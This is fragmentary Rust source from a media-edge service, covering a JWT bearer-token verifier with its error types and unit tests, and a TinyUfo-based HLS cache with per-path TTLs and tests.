:=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"violence_extreme",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"hate_speech",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"csam",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"terrorism"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Restricted content (requires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restricted :=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"violence_moderate",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"profanity",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"adult_content"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Violation: Prohibited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deny[msg]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 := input.request.content_category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 in prohibited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 := sprintf("CRITICAL: Prohibited content detected: %v", [category])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Warning: Restricted content without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warn[msg]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 := input.request.content_category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 in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 input.request.context_justification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 := sprintf("MEDIUM: Restricted content requires context: %v", [category])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 if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count(deny)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judge-layer3-sa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"judge-layer3@${PROJECT_ID}.iam.gserviceaccount.com"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judge-layer3-rules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judge-layer3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judge-layer3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judge-layer3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judge-layer3-sa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Node affinity for governance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nodeSelectorTerms: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judge-layer3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"Equal"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"NoSchedule"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openpolicyagent/opa:0.60.0-rootless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"--server"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"--addr=0.0.0.0:8181"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"--config-file=/etc/opa/config.yaml"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"/policies"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8181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8181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/health?bundle=true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8181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judge-rules-adapter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gcr.io/${PROJECT_ID}/judge-rules-adapter:latest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OPA_ENDPOINT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"http://localhost:8181"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P99_LATENCY_TARGET_MS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judge-layer3-config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key: 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judge-layer3-config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judge-layer3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judge-layer3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8181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8181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judge-layer3-hpa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judge-layer3-rules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judge-layer3-pdb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judge-layer3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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/layer3-rules-deployment.yaml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SLA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LATENCY_SLA_P99_MS: "90"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LATENCY_SLA_P95_MS: "60"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LATENCY_SLA_P50_MS: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Vertex AI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VERTEX_AI_ENDPOINT: "https://us-central1-aiplatform.googleapis.com"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VERTEX_AI_LOCATION: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GEMINI_MODEL_NAME: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GEMINI_TUNED_MODEL_NAME: "gemini-3.1-flash-lite-preview-tuned"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Judge 6 Hybrid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ENABLE_LAYER_1_GEMINI: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ENABLE_LAYER_2_PYTORCH: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ENABLE_LAYER_3_RULES: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Circuit Breaker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CIRCUIT_BREAKER_THRESHOLD_MS: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CIRCUIT_BREAKER_FALLBACK_MODE: "rules-only"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CIRCUIT_BREAKER_RECOVERY_TIME_SEC: "60"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MAX_CONCURRENT_REQUESTS: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REQUEST_TIMEOUT_MS: "150"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GPU_MEMORY_LIMIT_GB: "16"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METRICS_PORT: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HEALTH_CHECK_PORT: "8081"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PROMETHEUS_ENABLED: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TRACE_SAMPLING_RATE: "0.1"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ENABLE_REQUEST_LOGGING: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ENABLE_DETAILED_METRICS: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ENABLE_SHADOW_VALIDATION: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critical-path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critical-path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pnkln-judge-sa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Affinity rules to spread pods across zones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topology.kubernetes.io/zone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GPU node selector for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cloud.google.com/gke-accelerator: nvidia-l4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Layer 1: Gemini Policy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gemini-layer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gcr.io/pnkln-validation/judge-gemini:latest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gemini-api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VERTEX_AI_ENDPOINT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judge-6-config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VERTEX_AI_ENDPOINT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VERTEX_AI_LOCATION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judge-6-config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VERTEX_AI_LOCATION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judge-6-config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GEMINI_TUNED_MODEL_NAME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pnkln-validation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LAYER_TIMEOUT_MS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Layer 2: PyTorch Enforcement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pytorch-enforcer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gcr.io/pnkln-validation/judge-pytorch:latest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pytorch-api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"/models/enforcement-v1"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LAYER_TIMEOUT_MS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"40"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GPU_DEVICE_ID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Layer 3: Deterministic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rules-engine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gcr.io/pnkln-validation/judge-rules:latest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rules-api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RULES_CONFIG_PATH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"/config/rules.json"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LAYER_TIMEOUT_MS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CACHE_ENABLED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CACHE_TTL_SEC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rules-config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Orchestrator: Coordinates 3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gcr.io/pnkln-validation/judge-orchestrator:latest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GEMINI_ENDPOINT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"http://localhost:8001"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PYTORCH_ENDPOINT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"http://localhost:8002"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RULES_ENDPOINT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"http://localhost:8003"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LATENCY_SLA_P99_MS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judge-6-config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LATENCY_SLA_P99_MS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CIRCUIT_BREAKER_THRESHOLD_MS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judge-6-config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CIRCUIT_BREAKER_THRESHOLD_MS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CIRCUIT_BREAKER_FALLBACK_MODE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judge-6-config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CIRCUIT_BREAKER_FALLBACK_MODE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judge-6-config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sizeLimit: 50Gi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rules-config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judge-rules-config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Termination grace period for clean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terminationGracePeriodSeconds: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judge-6-hybrid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Primary metric: p99 latency (custom metric from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judge_request_latency_p99_milliseconds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"85"  # Buffer below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Secondary metric: CPU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Tertiary metric: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nvidia_gpu_duty_cycle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Request rate metric for proactive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judge_requests_per_second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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge/pdb.yaml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unhealthyPodEvictionPolicy: AlwaysAllow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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge/pdb.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge/rules-config.yaml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judge-rules-config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"last_updated": "2025-11-14",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"rules":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"R001",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"Gemini Approval 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"Require Gemini layer approval for final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"field": "gemini_decision",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"operator": "equals",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"continue",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"priority":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"R002",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"PyTorch Score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"Require minimum PyTorch enforcement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"field": "pytorch_score",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"operator": "greater_than",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"continue",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"priority":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"R003",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"Explicit Deny Override",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"Always deny if any layer explicitly denies",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"gemini_decision",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"operator": "equals",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"pytorch_score",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"operator": "less_than",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"deny",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"priority":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"R004",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"Circuit Breaker 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"Fall back to rules-only mode if layers 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"gemini_timeout",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"operator": "equals",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"pytorch_timeout",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"operator": "equals",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"fallback_rules_only",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"priority":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"R005",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"name": "High Confidence Auto-Approve",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"Auto-approve if all layers highly confident",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"condition":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"gemini_confidence",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"operator": "greater_than",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"pytorch_score",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"operator": "greater_than",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"action":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"priority":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"default_action": "deny",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"timeout_action": "fallback_rules_only"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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge/rules-config.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/llm-router/deployment.yaml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Router - Google Hypercomputer Allocation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Multi-model routing: Gemini 40%, Claude 35%, GPT-5 15%, Grok 5%, Local vLLM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p99 ≤90ms end-to-end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Routing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strategy: "weighted"  # weighted | least-latency | round-robin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Model allocation (must sum to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model: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provider: "vertex-ai"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weight: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endpoint: "us-central1-aiplatform.googleapis.com"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max_qps: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timeout_ms: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model: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provider: "anthropic"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weight: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endpoint: "api.anthropic.com"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max_qps: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timeout_ms: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model: "gpt-4"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provider: "openai"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weight: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endpoint: "api.openai.com"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max_qps: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timeout_ms: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model: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provider: "xai"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weight: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endpoint: "api.x.ai"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max_qps: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timeout_ms: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model: "llama-3.1-70b"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provider: "vllm-local"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weight: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endpoint: "http://vllm-service.llm-inference.svc.cluster.local:8000"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max_qps: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timeout_ms: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Failover cascade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fallback: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primary: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fallback: "gpt-4"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primary: "gpt-4"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fallback: "llama-3.1-70b"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fallback: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p99_latency_ms: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p95_latency_ms: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p50_latency_ms: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target_qps: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timeout_ms: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backend: "redis"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redis_endpoint: "redis-service.llm-inference.svc.cluster.local:6379"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ttl_seconds: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key_prefix: "llm-cache:"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judge_endpoint: "http://judge-webhook.ShadowTag-v2jr-governance.svc.cluster.local:443"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enforcement_mode: "enforce"  # enforce | audit |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timeout_ms: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budget_usd_per_month: 65000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alert_thresholds: [0.5, 0.75, 0.9, 1.0]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cost_per_1k_tokens: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gemini-3.1-flash-lite-preview: 0.0025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claude-3-5-sonnet-20241022: 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gpt-4: 0.006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grok-beta: 0.004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llama-3.1-70b: 0.0005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API keys (replace with actual values from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ANTHROPIC_API_KEY: "sk-ant-xxx"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OPENAI_API_KEY: "sk-xxx"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XAI_API_KEY: "xai-xxx"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REDIS_PASSWORD: "[VAPORIZED_PWD]"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"llm-router@${PROJECT_ID}.iam.gserviceaccount.com"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llm-router-sa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Node affinity for inference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cognitive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"Equal"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"cognitive"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"NoSchedule"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gcr.io/${PROJECT_ID}/llm-router:latest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9000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CONFIG_PATH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"/etc/llm-router/config.yaml"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llm-router-secrets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llm-router-secrets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XAI_API_KEY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llm-router-secrets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XAI_API_KEY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llm-router-secrets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REDIS_PASSWORD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ENABLE_TRACING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JAEGER_ENDPOINT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"http://jaeger-collector.monitoring.svc.cluster.local:14268/api/traces"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llm-router-config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"llm-router-backendconfig"}'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http_requests_per_second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p99_latency_milliseconds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llm-router-pdb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for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StatefulSet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serviceName: redis-service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redis-server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--requirepass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"$(REDIS_PASSWORD)"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--appendonly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llm-router-secrets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REDIS_PASSWORD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volumeClaimTemplates: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redis-data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accessModes: ["ReadWriteOnce"]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storageClassName: "standard-rwo"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storage: 50Gi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redis-service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clusterIP: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apps/aiyou_stack/aiyou-fastapi-services/k8s/llm-router/deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/grafana-deployment.yaml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Grafana Deployment with Pre-configured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Dashboards: Inference Overview, Judge 6, GPU Utilization,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grafana-datasources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prometheus.yaml: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access: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http://prometheus.monitoring.svc.cluster.local:9090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isDefault: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editable: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grafana-dashboards-config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dashboards.yaml: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'default'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orgId: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folder: 'PNKLN Inference'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disableDeletion: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updateIntervalSeconds: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allowUiUpdates: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/var/lib/grafana/dashboards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grafana-dashboard-inference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inference-overview.json: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"dashboard":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"Inference Overview",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["inference", "latency", "qps"],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"timezone": "browser",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"panels":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"P99 Latency (SLA: 90ms)",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"histogram_quantile(0.99, rate(http_request_duration_seconds_bucket[5m])) * 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"p99"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0, "y":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"Requests per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"sum(rate(http_requests_total[5m]))",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"QPS"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12, "y":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"Error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"sum(rate(http_requests_total{code=~\"5..\"}[5m])) / sum(rate(http_requests_total[5m]))",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"5xx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0, "y":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"Model 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"sum(rate(llm_requests_total{model=\"gemini-3.1-flash-lite-preview\"}[5m]))", "legendFormat": "Gemini (40%)"},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"sum(rate(llm_requests_total{model=\"claude-3-5-sonnet-20241022\"}[5m]))", "legendFormat": "Claude (35%)"},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"sum(rate(llm_requests_total{model=\"gpt-4\"}[5m]))", "legendFormat": "GPT-4 (15%)"},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"sum(rate(llm_requests_total{model=\"grok-beta\"}[5m]))", "legendFormat": "Grok (5%)"},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"sum(rate(llm_requests_total{model=\"llama-3.1-70b\"}[5m]))", "legendFormat": "Llama 3.1 (5%)"}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"piechart",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12, "y":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grafana-dashboard-judge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judge-6-dashboard.json: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"dashboard":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 6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["governance", "compliance", "atp-5-19"],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"timezone": "browser",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"panels":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"Coverage (Target: 98%)",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"(sum(rate(judge_requests_total[5m])) / sum(rate(http_requests_total[5m]))) *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"Coverage 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8, "x": 0, "y":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"Layer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"sum(rate(judge_layer1_requests_total[5m]))", "legendFormat": "Layer 1 (Gemini)"},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"sum(rate(judge_layer2_requests_total[5m]))", "legendFormat": "Layer 2 (PyTorch)"},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"sum(rate(judge_layer3_requests_total[5m]))", "legendFormat": "Layer 3 (Rules)"}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"piechart",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8, "x": 8, "y":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"Violations by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 by (policy_id) (rate(judge_violations_total[5m]))", "legendFormat": "{{policy_id}}"}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8, "x": 16, "y":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"Layer 1 Latency (Target: &lt;30ms)",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"histogram_quantile(0.99, rate(judge_layer1_latency_seconds_bucket[5m])) * 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"p99"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8, "x": 0, "y":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"Layer 2 Latency (Target: &lt;40ms)",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"histogram_quantile(0.99, rate(judge_layer2_latency_seconds_bucket[5m])) * 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"p99"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8, "x": 8, "y":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"Layer 3 Latency (Target: &lt;20ms)",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"histogram_quantile(0.99, rate(judge_layer3_latency_seconds_bucket[5m])) * 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"p99"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8, "x": 16, "y":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grafana-dashboard-gpu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gpu-utilization.json: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"dashboard":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"GPU Utilization",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["gpu", "nvidia", "l4"],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"timezone": "browser",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"panels":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"GPU Utilization (Target: 70-85%)",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"avg(DCGM_FI_DEV_GPU_UTIL)",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"GPU Util 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0, "y":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"GPU Memory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"avg(DCGM_FI_DEV_FB_USED / DCGM_FI_DEV_FB_FREE * 100)",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"Memory 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12, "y":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"GPU Temperature",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"avg(DCGM_FI_DEV_GPU_TEMP)",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"Temperature °C"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0, "y":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"GPU Power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"avg(DCGM_FI_DEV_POWER_USAGE)",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"Power (W)"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12, "y":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grafana-dashboard-cost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cost-tracking.json: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"dashboard":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"Cost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["cost", "budget", "roi"],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"timezone": "browser",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"panels":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"Monthly Cost Projection (Budget: $65K)",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"sum(rate(llm_router_cost_usd[1h])) * 730",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"Projected Monthly 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0, "y":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"Cost by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{"expr": "sum by (model) (rate(llm_router_cost_usd[1h])) * 730", "legendFormat": "{{model}}"}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"piechart",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12, "y":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"Hourly Burn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"sum(rate(llm_router_cost_usd[1h]))",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"$/hour"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0, "y":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"Budget Utilization",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"expr": "(sum(increase(llm_router_cost_usd[30d])) / 65000) *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"legendFormat": "Budget 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"gridPos": {"h": 8, "w": 12, "x": 12, "y":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grafana/grafana:10.2.2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GF_SECURITY_ADMIN_USER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GF_SECURITY_ADMIN_PASSWORD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grafana-secrets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admin-password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GF_INSTALL_PLUGINS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"grafana-piechart-panel,grafana-clock-panel"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grafana-storage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/var/lib/grafana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datasources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/etc/grafana/provisioning/datasources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dashboards-config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/etc/grafana/provisioning/dashboards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dashboard-inference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/var/lib/grafana/dashboards/inference-overview.json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subPath: inference-overview.json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dashboard-judge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/var/lib/grafana/dashboards/judge-6-dashboard.json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subPath: judge-6-dashboard.json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dashboard-gpu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/var/lib/grafana/dashboards/gpu-utilization.json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subPath: gpu-utilization.json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dashboard-cost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/var/lib/grafana/dashboards/cost-tracking.json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subPath: cost-tracking.json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grafana-storage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claimName: grafana-pvc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datasources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grafana-datasources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dashboards-config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grafana-dashboards-config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dashboard-inference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grafana-dashboard-inference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dashboard-judge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grafana-dashboard-judge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dashboard-gpu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grafana-dashboard-gpu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dashboard-cost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grafana-dashboard-cost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standard-rwo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10Gi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grafana-secrets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admin-password: "[VAPORIZED_PWD]"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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/grafana-deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/prometheus-rules.yaml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monitoring.coreos.com/v1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PrometheusRule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judge-6-sla-rules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prometheus: kube-prometheus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judge_6_latency_sla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 Breach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Judge6LatencyP99Breach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histogram_quantile(0.99,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sum(rate(judge_request_duration_seconds_bucket{namespace="pnkln-core"}[1m])) by (le)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&gt; 0.090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sla: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"Judge 6 p99 latency exceeds 90ms SLA"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"Current p99 latency: {{ $value | humanizeDuration }}. SLA requires ≤90ms. Immediate scale-up required."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runbook: "https://docs.pnkln.internal/runbooks/judge-6-latency-breach"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Judge6LatencyP95Warning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histogram_quantile(0.95,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sum(rate(judge_request_duration_seconds_bucket{namespace="pnkln-core"}[1m])) by (le)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&gt; 0.060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sla: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"Judge 6 p95 latency approaching SLA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"Current p95 latency: {{ $value | humanizeDuration }}. Target: ≤60ms. Investigate before p99 breach."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Error Rate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Judge6HighErrorRate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sum(rate(judge_request_errors_total{namespace="pnkln-core"}[5m]))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sum(rate(judge_request_total{namespace="pnkln-core"}[5m]))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"Judge 6 error rate exceeds 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"Current error rate: {{ $value | humanizePercentage }}. Normal: &lt;1%. Check layer health."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Circuit Breaker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Judge6CircuitBreakerTripped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increase(judge_circuit_breaker_trips_total{namespace="pnkln-core"}[5m])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"Judge 6 circuit breaker frequently tripping"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"Circuit breaker trips in last 5m: {{ $value }}. Indicates layer timeouts. Check Gemini/PyTorch layer health."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 Utilization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Judge6GPUUnderutilized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avg(nvidia_gpu_duty_cycle{namespace="pnkln-core"}) &lt;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15m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cost_optimization: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"Judge 6 GPU underutilized"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"Average GPU utilization: {{ $value }}%. Consider scaling down or using smaller instance types."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Judge6GPUOverutilized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avg(nvidia_gpu_duty_cycle{namespace="pnkln-core"}) &gt;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"Judge 6 GPU overutilized"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"Average GPU utilization: {{ $value }}%. May cause queuing delays. Scale up."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Layer-Specific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Judge6GeminiLayerSlow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histogram_quantile(0.99,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sum(rate(judge_layer_duration_seconds_bucket{layer="gemini"}[1m])) by (le)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&gt; 0.030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"Gemini layer p99 exceeds 30ms"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"Gemini layer latency: {{ $value | humanizeDuration }}. Target: ≤30ms for overall SLA compliance."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Judge6PyTorchLayerSlow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histogram_quantile(0.99,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sum(rate(judge_layer_duration_seconds_bucket{layer="pytorch"}[1m])) by (le)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&gt; 0.040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layer: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"PyTorch layer p99 exceeds 40ms"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"PyTorch layer latency: {{ $value | humanizeDuration }}. Target: ≤40ms for overall SLA compliance."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Request Volume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Judge6LowRequestVolume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sum(rate(judge_request_total{namespace="pnkln-core"}[5m])) &lt;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"Judge 6 receiving low request volume"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"Request rate: {{ $value }} req/s. Indicates possible routing issue or validation sprint idle."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alert: Judge6HighRequestVolume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sum(rate(judge_request_total{namespace="pnkln-core"}[5m])) &gt;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for: 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"Judge 6 receiving high request volume"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"Request rate: {{ $value }} req/s. Ensure HPA is scaling appropriately."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Recording Rules for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judge_6_recording_rules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record: judge:request_latency_p99:30s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histogram_quantile(0.99,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sum(rate(judge_request_duration_seconds_bucket{namespace="pnkln-core"}[30s])) by (le)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record: judge:request_latency_p95:30s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histogram_quantile(0.95,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sum(rate(judge_request_duration_seconds_bucket{namespace="pnkln-core"}[30s])) by (le)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record: judge:request_latency_p50:30s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histogram_quantile(0.50,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sum(rate(judge_request_duration_seconds_bucket{namespace="pnkln-core"}[30s])) by (le)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record: judge:error_rate:5m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sum(rate(judge_request_errors_total{namespace="pnkln-core"}[5m]))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sum(rate(judge_request_total{namespace="pnkln-core"}[5m]))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record: judge:request_rate:1m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sum(rate(judge_request_total{namespace="pnkln-core"}[1m]))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record: judge:gpu_utilization:avg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avg(nvidia_gpu_duty_cycle{namespace="pnkln-core"})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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/prometheus-rules.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/prometheus-servicemonitor.yaml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monitoring.coreos.com/v1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judge-6-monitor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release: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scrapeTimeout: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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/prometheus-servicemonitor.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/prometheus-stack.yaml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Stack for PNKLN Inference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Managed Prometheus + Grafana + Alertmanager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Key metrics: p99 latency, QPS, GPU utilization,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prometheus-config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prometheus.yml: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scrape_interval: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evaluation_interval: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external_labels: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cluster: 'pnkln-inference-prod'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environment: 'production'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Alertmanager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alertmanagers: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alertmanager:9093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/etc/prometheus/rules/*.yml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Scrape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Layer 1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job_name: 'judge-layer1'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kubernetes_sd_configs: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relabel_configs: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source_labels: [__meta_kubernetes_pod_label_app]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judge-layer1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source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_scrape]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source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_port]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target_label: __address__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(.+):(.+)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$1:9090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Layer 2 (PyTorch)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job_name: 'judge-layer2'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kubernetes_sd_configs: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relabel_configs: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source_labels: [__meta_kubernetes_pod_label_app]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judge-layer2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Layer 3 (Rules)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job_name: 'judge-layer3'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kubernetes_sd_configs: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relabel_configs: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source_labels: [__meta_kubernetes_pod_label_app]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judge-layer3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LLM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job_name: 'llm-router'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kubernetes_sd_configs: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relabel_configs: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source_labels: [__meta_kubernetes_pod_label_app]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llm-router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job_name: 'vllm'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kubernetes_sd_configs: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llm-inference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relabel_configs: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source_labels: [__meta_kubernetes_pod_label_app]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NVIDIA DCGM Exporter (GPU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job_name: 'nvidia-dcgm'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kubernetes_sd_configs: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relabel_configs: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source_labels: [__meta_kubernetes_pod_label_app]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nvidia-dcgm-exporter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Kubelet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job_name: 'kubelet'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scheme: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tls_config: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ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt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bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token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kubernetes_sd_configs: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relabel_configs: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target_label: __address__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kubernetes.default.svc:443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source_labels: [__meta_kubernetes_node_name]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(.+)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target_label: __metrics_path__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/api/v1/nodes/${1}/proxy/metrics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Alert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alerts.yml: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inference_latency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P99 latency SLA violation (&gt;90ms)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InferenceP99LatencyHigh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histogram_quantile(0.99, rate(http_request_duration_seconds_bucket[5m])) &gt; 0.090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"Inference p99 latency exceeds 90ms SLA"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"p99 latency is {{ $value }}s (threshold: 0.090s)"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P95 latency warning (&gt;60ms)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InferenceP95LatencyHigh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histogram_quantile(0.95, rate(http_request_duration_seconds_bucket[5m])) &gt; 0.060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"Inference p95 latency exceeds 60ms"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"p95 latency is {{ $value }}s (threshold: 0.060s)"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judge_coverage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Judge 6 coverage below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JudgeCoverageLow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(sum(rate(judge_requests_total[5m])) / sum(rate(http_requests_total[5m]))) &lt;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"Judge 6 coverage below 98% SLA"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"Current coverage: {{ $value | humanizePercentage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Judge layer 1 failure rate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JudgeLayer1FailureRateHigh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rate(judge_layer1_errors_total[5m]) / rate(judge_layer1_requests_total[5m]) &gt;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"Judge Layer 1 failure rate exceeds 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"Failure rate: {{ $value | humanizePercentage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gpu_utilization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GPU utilization below 70% (underutilization)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GPUUtilizationLow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avg(DCGM_FI_DEV_GPU_UTIL) &lt;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cost-optimization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"GPU utilization below 70%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"Current utilization: {{ $value }}%"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GPU memory utilization above 95% (risk of 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GPUMemoryHigh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avg(DCGM_FI_DEV_FB_USED / DCGM_FI_DEV_FB_FREE) &gt;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"GPU memory utilization above 95%"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"Current memory usage: {{ $value | humanizePercentage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cost_tracking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60s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Monthly cost projection exceeds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MonthlyCostProjectionHigh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sum(rate(llm_router_cost_usd[1h])) * 730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&gt; 65000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"Monthly cost projection exceeds $65K budget"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"Projected monthly cost: ${{ $value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Cost burn rate 50% above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CostBurnRateHigh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sum(rate(llm_router_cost_usd[1h])) * 730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&gt; (65000 *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30m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"Cost burn rate 50% above budget"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"Current burn rate: ${{ $value }}/mo"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Service availability below 99.95% (3-9s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alert: ServiceAvailabilityLow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sum(rate(http_requests_total{code=~"2.."}[5m]))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sum(rate(http_requests_total[5m]))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&lt; 0.9995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"Service availability below 99.95% SLA"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"Current availability: {{ $value | humanizePercentage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prometheus-sa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prom/prometheus:v2.48.0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'--config.file=/etc/prometheus/prometheus.yml'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'--storage.tsdb.path=/prometheus'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'--storage.tsdb.retention.time=30d'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'--web.enable-lifecycle'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'--web.enable-admin-api'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/etc/prometheus/rules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prometheus-config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prometheus-config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claimName: prometheus-pvc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prometheus-pvc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standard-rwo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100Gi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prometheus-sa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ClusterRole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prometheus-role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nodes/proxy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"list", "watch"]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"list", "watch"]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nonResourceURLs: ["/metrics"]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ClusterRoleBinding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prometheus-rolebinding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apiGroup: rbac.authorization.k8s.io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ClusterRole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prometheus-role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prometheus-sa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NVIDIA DCGM Exporter for GPU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nvidia-dcgm-exporter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nvidia-dcgm-exporter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nvidia-dcgm-exporter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nvidia-dcgm-exporter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gpu_type: nvidia-l4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dcgm-exporter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nvcr.io/nvidia/k8s/dcgm-exporter:3.2.0-3.1.8-ubuntu22.04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DCGM_EXPORTER_LISTEN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":9400"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DCGM_EXPORTER_KUBERNETES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SYS_ADMIN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pod-resources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/var/lib/kubelet/pod-resources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pod-resources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/var/lib/kubelet/pod-resources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apps/aiyou_stack/aiyou-fastapi-services/k8s/monitoring/prometheus-stack.yaml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YouAi GPU Infrastructure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Terraform Configuration -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2.23"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"hashicorp/helm"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"youai-terraform-state"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"gke-gpu-cluster"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"google-beta"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GKE cluster credentials for Kubernetes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"google_client_config" "default"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"google_container_cluster" "primary"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module.gke_cluster.cluster_name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"kubernetes"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                   = "https://${data.google_container_cluster.primary.endpoint}"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                  = data.google_client_config.default.access_token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cluster_ca_certificate = base64decode(data.google_container_cluster.primary.master_auth[0].cluster_ca_certificate)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"helm"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kubernetes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                   = "https://${data.google_container_cluster.primary.endpoint}"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                 = data.google_client_config.default.access_token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cluster_ca_certificate = base64decode(data.google_container_cluster.primary.master_auth[0].cluster_ca_certificate)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= "${var.project_name}-${var.environment}-gpu"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common_labels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managed_by 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    = var.project_name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       = "platform-engineering"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gpu_node_pools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inference_l4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"inference-l4-pool"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"g2-standard-4"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finetune_a100_2g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"finetune-a100-2g-pool"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"a2-highgpu-2g"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"fine-tuning"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training_a100_8g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"training-a100-8g-pool"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"a2-ultragpu-8g"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"nvidia-a100-80gb"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spot_a100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"spot-a100-pool"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"a2-highgpu-1g"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multi_agent_a100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"multi-agent-a100-pool"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"a2-highgpu-4g"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VPC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 = "terraform-google-modules/network/google"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 = "~&gt; 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network_name = "${var.project_name}-vpc"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routing_mode = "REGIONAL"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subnet_name           = "${var.project_name}-gpu-subnet"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subnet_ip             = "10.0.0.0/20"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subnet_region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subnet_private_access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subnet_flow_logs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secondary_ranges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"${var.project_name}-gpu-subnet"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range_name  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ip_cidr_range = "10.16.0.0/14"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range_name   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ip_cidr_range = "10.20.0.0/20"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NAT (for private cluster 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"google_compute_router" "router"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= "${var.project_name}-router"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module.vpc.network_name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"google_compute_router_nat" "nat"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= "${var.project_name}-nat"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 = google_compute_router.router.name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nat_ip_allocate_option = "AUTO_ONLY"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source_subnetwork_ip_ranges_to_nat = "ALL_SUBNETWORKS_ALL_IP_RANGES"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= "ERRORS_ONLY"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"gke_cluster"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"./modules/gke-gpu-cluster"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    = local.cluster_name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   = module.vpc.network_name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       = module.vpc.subnets_names[0]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pods_range_name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services_range_name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master_ipv4_cidr_block = "172.16.0.0/28"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master_authorized_networks = var.master_authorized_networks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"gpu_node_pools"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"./modules/gke-gpu-node-pool"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local.gpu_node_pools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 = module.gke_cluster.cluster_name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pool_name         = each.value.name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= each.value.machine_type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= each.value.accelerator_type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= each.value.accelerator_count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   = each.value.disk_size_gb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disk_type         = each.value.disk_type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min_node_count = each.value.min_nodes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max_node_count = each.value.max_nodes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= each.value.initial_nodes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 = each.value.preemptible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= each.value.workload_label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      = split("-", each.value.accelerator_type)[1]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     = each.value.name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node_taints = each.value.preemptible ?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"cloud.google.com/gke-spot"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NVIDIA GPU Operator (via Helm)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"helm_release" "gpu_operator"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= "gpu-operator"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       = "https://helm.ngc.nvidia.com/nvidia"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chart            = "gpu-operator"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       = "gpu-operator"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create_namespace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          = "v23.9.0"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yamlencode({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false  # GKE pre-installs drivers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toolkit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dcgm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dcgmExporter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serviceMonitor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 = var.enable_prometheus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devicePlugin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"single"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defaultRuntime = "containerd"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gfd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[module.gke_cluster, module.gpu_node_pools]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"kubernetes_namespace" "ml_training"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"ml-training"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"machine-learning-training"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"kubernetes_namespace" "production"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"production-inference"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"kubernetes_namespace" "monitoring"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"observability"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Storage Bucket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"models"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"${var.project_id}-models"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         = "SetStorageClass"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storage_class = "NEARLINE"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"checkpoints"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"${var.project_id}-checkpoints"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Accounts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"training_sa"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"gke-training-sa"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"GKE Training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"inference_sa"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"gke-inference-sa"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"GKE Inference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"training_storage"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"serviceAccount:${google_service_account.training_sa.email}"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"inference_storage"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"serviceAccount:${google_service_account.inference_sa.email}"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"training_workload_identity"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google_service_account.training_sa.name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     = "serviceAccount:${var.project_id}.svc.id.goog[ml-training/training-sa]"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"inference_workload_identity"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google_service_account.inference_sa.name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     = "serviceAccount:${var.project_id}.svc.id.goog[production/inference-sa]"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"kubernetes_service_account" "training_sa"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     = "training-sa"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= kubernetes_namespace.ml_training.metadata[0].name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"iam.gke.io/gcp-service-account" = google_service_account.training_sa.email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"kubernetes_service_account" "inference_sa"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     = "inference-sa"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= kubernetes_namespace.production.metadata[0].name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"iam.gke.io/gcp-service-account" = google_service_account.inference_sa.email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"google_billing_budget" "gpu_budget"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 = var.budget_amount &gt; 0 ? 1 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billing_account = var.billing_account_id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   = "GPU Compute Budget"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budget_filter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 = ["projects/${data.google_project.project.number}"]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specified_amount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currency_code = "USD"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units         = tostring(var.budget_amount)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all_updates_rule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monitoring_notification_channels = var.budget_notification_channels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disable_default_iam_recipients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"google_project" "project"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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/outputs.tf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 for YouAi GKE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"Name of the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module.gke_cluster.cluster_name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module.gke_cluster.cluster_endpoint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"cluster_location"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location"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module.gke_cluster.cluster_location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"gpu_node_pools"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"GPU node pool names"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{ for k, v in module.gpu_node_pools : k =&gt; v.node_pool_name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"models_bucket"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for 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google_storage_bucket.models.name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"checkpoints_bucket"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for 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google_storage_bucket.checkpoints.name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"training_service_account"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"Training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google_service_account.training_sa.email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"inference_service_account"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"Inference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google_service_account.inference_sa.email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"configure_kubectl"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"Command to configure kubectl"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"gcloud container clusters get-credentials ${module.gke_cluster.cluster_name} --region ${var.region} --project ${var.project_id}"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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/outputs.tf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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/README.md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Omega GKE GPU Infrastructure -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Terraform configurations for deploying Omega's GPU infrastructure on Google Kubernetes Engine (GKE).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Terraform configuration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regional cluster with private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GPU node pools (L4, A100, H100, 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NVIDIA GPU Operator via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buckets for models and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with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Tools**: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Terraform &gt;= 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**GCP Authentication**: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config set project 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**Enable Required APIs**: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storage-api.googleapis.com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iam.googleapis.com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cloudresourcemanager.googleapis.com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billingbudgets.googleapis.com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GCS Bucket for Terraform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mb -p omega-production -l us-central1 gs://omega-terraform-state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versioning set on gs://omega-terraform-state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**Request GPU Quota** (if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current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compute project-info describe --project=omega-production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Request quota increase via GCP Console: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IAM &amp; Admin &gt; Quotas &gt; Filter: "NVIDIA" &gt; Request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Initialize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k8s/terraform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and edit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terraform.tfvars  # Fill in your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what will be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GPU node pools, networking,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when prompted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takes ~15-20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Verify GPU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cloud.google.com/gke-accelerator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 &lt;node-name&gt; | grep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k8s/terraform/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main.tf                     # Main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variables.tf                # Input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outputs.tf                  # Output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terraform.tfvars.example    # Example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gke-gpu-cluster/        # GKE cluster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gke-gpu-node-pool/      # GPU node pool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configuration creates 4 GPU node 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Pool Name | GPUs | Machine Type | Use Case | Cost/hr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|-----------|------|--------------|----------|---------|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**inference-l4-pool** | 1× L4 | g2-standard-4 | Inference | ~$0.70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**finetune-a100-2g-pool** | 2× A100 40GB | a2-highgpu-2g | Fine-tuning | ~$6.00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**training-a100-8g-pool** | 8× A100 80GB | a2-ultragpu-8g | Training | ~$28.00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**spot-a100-pool** | 1× A100 | a2-highgpu-1g | Batch (spot) | ~$1.50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pools start with 0 nodes and auto-scale based on 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 alerts are configured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threshold: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- 80% threshold: Urgent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threshold: Critical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`budget_amount` in `terraform.tfvars` to set monthly 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projects describe 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BigQuery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(Enabled by default in cluster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down a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accounts are configured with Workload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SA** 